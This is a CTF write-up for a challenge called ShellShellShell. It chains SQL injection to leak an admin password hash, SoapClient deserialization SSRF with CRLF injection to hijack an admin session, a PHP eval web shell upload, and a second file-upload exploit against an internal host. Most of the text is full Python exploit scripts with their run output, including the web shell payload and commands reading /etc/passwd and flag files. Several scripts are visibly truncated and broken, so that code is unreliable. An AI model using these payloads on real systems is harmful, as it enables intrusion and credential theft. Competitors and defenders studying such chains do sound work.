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It required the exploitation of several bugs in order to reach the flag, so let's start with an overview.

  • Backup files (example:.index.php.swp)
  • INSERT SQLi in publish functionality to exfiltrate admin credentials through un/serialized PHP object
  • SSRF (CRLF injection) through unsafe object deserialization to "bypass" $_SERVER['REMOTE_ADDR'] === '' condition and get authenticated admin session
  • Upload file and getshell.
  • Find another server in the inside net (IP: and get flag on it.

Get source code


# import requests
import urllib
import os
os.system('mkdir source')
os.system('mkdir source/views')
for i in file_list:
    print 'download %s '% url
    os.system('curl '+url+'>source/'+i)

sql injection

Lootint at the user.php and the insert function.

 private function get_column($columns){
            $column = ' `'.implode('`,`',$columns).'` ';
            $column = ' `'.$columns.'` ';
        return $column;
public function insert($columns,$table,$values){
        $column = $this->get_column($columns);
        $value = '('.preg_replace('/`([^`,]+)`/','\'${1}\'',$this->get_column($values)).')';
        $nid =
        $sql = 'insert into '.$table.'('.$column.') values '.$value;
        $result = $this->conn->query($sql);
        return $result;

We can use a common SQLi payload for insert statements but in order to cope with the preg_replace, we must use backticks (`) in place of single quotes ('). So, sending the following payload:

mood=0&signature=a`, `mood`); -- -

will result in the following MySQL query:

insert into ctf_user_signature( `userid`,`username`,`signature`,`mood` )
values ( '1','foo','a', 'mood'); -- -`,'0' )


Use sql_exp.py to get admin hash.

import re
import string
import random
import requests
import subprocess
import hashlib
from itertools import product


def get_code_dict():
    c = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_ []{}<>~`+=,.;:/?|'
    captchas = [''.join(i) for i in product(c, repeat=3)]

    print '[+] Genering {} captchas...'.format(len(captchas))
    with open('captchas.txt', 'w') as f:
        for k in captchas:
            f.write(hashlib.md5(k).hexdigest()+' --> '+k+'\n')

def get_creds():
    username = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(10))
    password = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(10))
    return username, password

def solve_code(html):
    code = re.search(r'Code\(substr\(md5\(\?\), 0, 5\) === ([0-9a-f]{5})\)', html).group(1)
    solution = subprocess.check_output(['grep', '^'+code, 'captchas.txt']).split()[2]
    return solution

def register(username, password):
    resp = sess.get(_target+'register')
    code = solve_code(resp.text)
    sess.post(_target+'register', data={'username':username,'password':password,'code':code})
    return True

def login(username, password):
    resp = sess.get(_target+'login')
    code = solve_code(resp.text)
    sess.post(_target+'login', data={'username':username,'password':password,'code':code})
    return True

def publish(sig, mood):
    return sess.post(_target+'publish', data={'signature':sig,'mood':mood})


sess = requests.Session()
username, password = get_creds()
print '[+] register({}, {})'.format(username, password)
register(username, password)
print '[+] login({}, {})'.format(username, password)
login(username, password)
print '[+] user session => ' + sess.cookies.get_dict()['PHPSESSID']

for i in range(1,33): # we know password is 32 chars (md5)
    mood = '(select concat(`O:4:\"Mood\":3:{{s:4:\"mood\";i:`,ord(substr(password,{},1)),`;s:2:\"ip\";s:14:\"\";s:4:\"date\";i:1520664478;}}`) from ctf_users where is_admin=1 limit 1)'.format(i)
    payload = 'a`, {}); -- -'.format(mood)
    resp = publish(payload, '0')

resp = sess.get(_target+'index')
moods = re.findall(r'img/([0-9]+)\.gif', resp.text)[::-1] # last publish will be read first in the html
admin_hash = ''.join(map(lambda k: chr(int(k)), moods))

print '[+] admin hash => ' + admin_hash

root@kali64:~# python sql_exp.py 
[+] Genering 778688 captchas...
[+] register(cvnyshokxj, sjt0ayo3c1)
[+] login(cvnyshokxj, sjt0ayo3c1)
[+] user session => 7fublips3949q8vcs611fcdha2
[+] admin hash => c991707fdf339958eded91331fb11ba0

After decryption,we get admin's password jaivypassword.



import re
import sys
import string
import random
import requests
import subprocess
from itertools import product
import hashlib
from itertools import product

_target = ''
_action = _target + 'index.php?action='

def get_code_dict():
    c = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_ []{}<>~`+=,.;:/?|'
    captchas = [''.join(i) for i in product(c, repeat=3)]

    print '[+] Genering {} captchas...'.format(len(captchas))
    with open('captchas.txt', 'w') as f:
        for k in captchas:
            f.write(hashlib.md5(k).hexdigest()+' --> '+k+'\n')

def get_creds():
    username = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(10))
    password = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(10))
    return username, password

def solve_code(html):
    code = re.search(r'Code\(substr\(md5\(\?\), 0, 5\) === ([0-9a-f]{5})\)', html).group(1)
    solution = subprocess.check_output(['grep', '^'+code, 'captchas.txt']).split()[2]
    return solution

def register(username, password):
    resp = sess.get(_action+'register')
    code = solve_code(resp.text)
    sess.post(_action+'register', data={'username':username,'password':password,'code':code})
    return True

def login(username, password):
    resp = sess.get(_action+'login')
    code = solve_code(resp.text)
    sess.post(_action+'login', data={'username':username,'password':password,'code':code})
    return True

def publish(sig, mood):
    return sess.post(_action+'publish', data={'signature':sig,'mood':mood})#, proxies={'http':''})

def get_prc_now():
    # date_default_timezone_set("PRC") is not important
    return subprocess.check_output(['php', '-r', 'date_default_timezone_set("PRC"); echo time();'])

def get_admin_session():
    sess = requests.Session()
    resp = sess.get(_action+'login')
    code = solve_code(resp.text)
    return sess.cookies.get_dict()['PHPSESSID'], code


print '[+] creating user session to trigger ssrf'
sess = requests.Session()

username, password = get_creds()

print '[+] register({}, {})'.format(username, password)
register(username, password)

print '[+] login({}, {})'.format(username, password)
login(username, password)

print '[+] user session => ' + sess.cookies.get_dict()['PHPSESSID']

print '[+] getting fresh session to be authenticated as admin'
phpsessid, code = get_admin_session()

ssrf = '\x0d\x0aContent-Length:0\x0d\x0a\x0d\x0a\x0d\x0aPOST /index.php?action=login HTTP/1.1\x0d\x0aHost:\x0d\x0aCookie: PHPSESSID={}\x0d\x0aContent-Type: application/x-www-form-urlencoded\x0d\x0aContent-Length: 200\x0d\x0a\x0d\x0ausername=admin&password=jaivypassword&code={}&\x0d\x0a\x0d\x0aPOST /foo\x0d\x0a'.format(phpsessid, code)
mood = 'O:10:\"SoapClient\":4:{{s:3:\"uri\";s:{}:\"{}\";s:8:\"location\";s:39:\"\";s:15:\"_stream_context\";i:0;s:13:\"_soap_version\";i:1;}}'.format(len(ssrf), ssrf)
mood = '0x'+''.join(map(lambda k: hex(ord(k))[2:].rjust(2, '0'), mood))

payload = 'a`, {}); -- -'.format(mood)

print '[+] final sqli/ssrf payload: ' + payload

print '[+] injecting payload through sqli'
resp = publish(payload, '0')

print '[+] triggering object deserialization -> ssrf'
sess.get(_action+'index')#, proxies={'http':''})

print '[+] admin session => ' + phpsessid

# switching to admin session
sess = requests.Session()
sess.cookies = requests.utils.cookiejar_from_dict({'PHPSESSID': phpsessid})

# resp = sess.post(_action+'publish')
# print resp.text

print '[+] uploading stager'
shell = {'pic': ('jaivy.php', '<?php @eval($_POST[jaivy]);?>', 'image/jpeg')}
resp = sess.post(_action+'publish', files=shell)
# print resp.text
print '[+] shell => '+webshell_url+'\n'

post_data={"jaivy":"system('ls -al');"}
resp = sess.post(url=webshell_url,data=post_data)
print resp.text

root@kali64:~# python ssrf_crlf_getshell_exp.py 
[+] Genering 778688 captchas...
[+] creating user session to trigger ssrf
[+] register(a6skt6cjpr, rw2dz23fjv)
[+] login(a6skt6cjpr, rw2dz23fjv)
[+] user session => b4sd5q2jtb0tlh4lmqoj4mcb92
[+] getting fresh session to be authenticated as admin
[+] final sqli/ssrf payload: a`, 0x4f3a31303a22536f6170436c69656e74223a343a7b733a333a22757269223b733a3237373a22687474703a2f2f3132372e302e302e312f0d0a436f6e74656e742d4c656e6774683a300d0a0d0a0d0a504f5354202f696e6465782e7068703f616374696f6e3d6c6f67696e20485454502f312e310d0a486f73743a203132372e302e302e310d0a436f6f6b69653a205048505345535349443d706f633672616771686d6e686933636e6e737136636a666332340d0a436f6e74656e742d547970653a206170706c69636174696f6e2f782d7777772d666f726d2d75726c656e636f6465640d0a436f6e74656e742d4c656e6774683a203230300d0a0d0a757365726e616d653d61646d696e2670617373776f72643d6a6169767970617373776f726426636f64653d4a3165260d0a0d0a504f5354202f666f6f0d0a223b733a383a226c6f636174696f6e223b733a33393a22687474703a2f2f3132372e302e302e312f696e6465782e7068703f616374696f6e3d6c6f67696e223b733a31353a225f73747265616d5f636f6e74657874223b693a303b733a31333a225f736f61705f76657273696f6e223b693a313b7d); -- -
[+] injecting payload through sqli
[+] triggering object deserialization -> ssrf
[+] admin session => poc6ragqhmnhi3cnnsq6cjfc24
[+] uploading stager
[+] shell =>

total 12
drwxrwxrwx 1 root     root     4096 Aug  5 18:07 .
drwxr-xr-x 1 root     root     4096 Aug  5 18:03 ..
-rw-r--r-- 1 www-data www-data   29 Aug  5 18:07 jaivy.php



After that,we can find an another server in the inside net ,which IP is .and the website source is :

    $sandbox = '/var/sandbox/' . md5("prefix" . $_SERVER['REMOTE_ADDR']);

        $filename = !empty($_POST['file']) ? $_POST['file'] : $_FILES['file']['name'];
        if (!is_array($filename)) 
            $filename = explode('.', $filename);
        $ext = end($filename);
        if($ext==$filename[count($filename) - 1])
            die("try again!!!");
        $new_name = (string)rand(100,999).".".$ext;
        $_ = $_POST['hello'];
                echo "you can do it!";

We can use getshell_2.py to getshell again.


import requests
import hashlib

target = ""
ip = ""
path = "/var/sandbox/%s/"%hashlib.md5(("prefix"+ip).encode()).hexdigest()

files = {"file":("x",open("1.txt","rb")),"file[1]":(None,'a'),"file[0]":(None,'b'),"hello":(None,"php://filter/string.strip_tags/resource=/etc/passwd")}

    for i in range(10):
except Exception as e:

for i in range(0,1000):
    files = {"file":("x",open("1.txt","rb")),"file[1]":(None,'a'),"file[0]":(None,'b'),"s":(None,"system('cat /etc/flag*');"),"hello":(None,path+str(i)+'.b')}
    resp = requests.post(target,files=files,).text
    if len(resp)>0:

We can use this command to find the location of the flag file.

find / -name "*flag*"
Original writeup (https://github.com/De1ta-team/De1CTF2019/tree/master/writeup/web/ShellShellShell).